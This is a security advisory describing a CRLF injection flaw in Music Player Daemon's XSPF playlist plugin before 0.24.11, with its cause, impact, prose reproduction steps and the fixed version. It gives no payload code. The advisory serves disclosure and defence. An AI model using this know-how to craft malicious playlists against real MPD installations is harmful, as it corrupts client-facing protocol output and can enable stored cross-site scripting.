Music Player Daemon CRLF Injection Vulnerability in XSPF Playlist Plugin

A CRLF injection vulnerability has been identified in Music Player Daemon (MPD) versions prior to 0.24.11. The issue resides in the XSPF playlist plugin, specifically within the 'xspf_char_data' function. This vulnerability allows attackers to embed literal carriage return and line feed bytes into URI fields by using a malicious XSPF playlist that includes XML numeric character references. Exploitation of this vulnerability involves injecting forged key-value lines through the 'location' field, which are then incorporated into MPD protocol responses such as 'playlistinfo', 'currentsong', and 'listplaylist'. Additionally, the injected data can disrupt the state file writer. The vulnerability arises from Expat's handling of numeric character references, which are decoded before the character data callback, creating an opportunity for injection.

Impact

Exploitation of this vulnerability leads to CRLF injection, allowing attackers to manipulate MPD's protocol responses. This could cause confusion for clients and disrupt applications that scrape MPD's output. Furthermore, for web clients that render playlist information into HTML without proper escaping, this vulnerability could introduce a stored cross-site scripting (XSS) risk.

Reproduction

To reproduce this vulnerability, upload a malicious XSPF file containing numeric character references that translate into newline characters into a server accessible by the MPD instance. Then, use an MPD client to load the playlist and request 'playlistinfo', 'currentsong', or 'listplaylist' which will reveal the injected CRLF characters in the response.

Remediation

Users can update to MPD version 0.24.11 or later, where this vulnerability has been fixed.